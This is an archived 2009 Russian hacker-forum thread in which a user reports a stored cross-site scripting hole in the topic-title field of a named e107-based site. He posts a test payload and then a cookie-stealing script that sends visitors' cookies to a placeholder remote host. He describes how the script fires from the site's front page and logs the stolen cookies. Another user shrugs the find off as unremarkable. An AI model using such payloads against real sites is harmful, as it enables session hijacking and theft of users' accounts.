Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

дыры уровня детсад

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> дыры уровня детсад
Имя
Сообщение << Старые топики   Новые топики >>
дыры уровня детсад - 2009-06-26 05:22:58.090000   
vzlomer

Сообщений: 3
Оценки: 0
Присоединился: 2009-06-26 05:13:18.946666
proilim.ru
ресурс стоит (качаясь) на e107. Версию не скажу.
Обнаружил дыру уровня детского сада. Просто аж себе не поверил.
При создании новойтемы на форуме, содержимое поля "название темы" толком не фильтруется.
Ввожу название ><script>alert(1)</script>< и даже при превью вылазит messagebox :)

Администрацию ресурса об уязвимости предупреждал 3 раза, начиная с начала месяца - не заделывают О_о
Post #: 1
RE: дыры уровня детсад - 2009-06-26 09:30:30.846666   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
и?
Post #: 2
RE: дыры уровня детсад - 2009-06-26 09:46:41.393333   
vzlomer

Сообщений: 3
Оценки: 0
Присоединился: 2009-06-26 05:13:18.946666
И?

и ><script>locate.href="http://somesite/script.php?c="+document.cookie</script><

У них там модуль на главной "последние темы на форуме". В итоге, зайдя на главную страницу сайта, скрипт срабатывает без проблем, а на удаленном somesite скриптик потихому форует куки пользователей, пишет их в файлик, а пользователю выдает phpinfo() какой-нибудь. профит?
Post #: 3
RE: дыры уровня детсад - 2009-06-26 15:41:53.803333   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
Я просто клоню к тому, что proilim.ru не такой известный сайт, чтобы постить новый топик о найденной xss на нем.
Post #: 4
Страниц:  [1]
Все форумы >> [В Сети] >> дыры уровня детсад







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.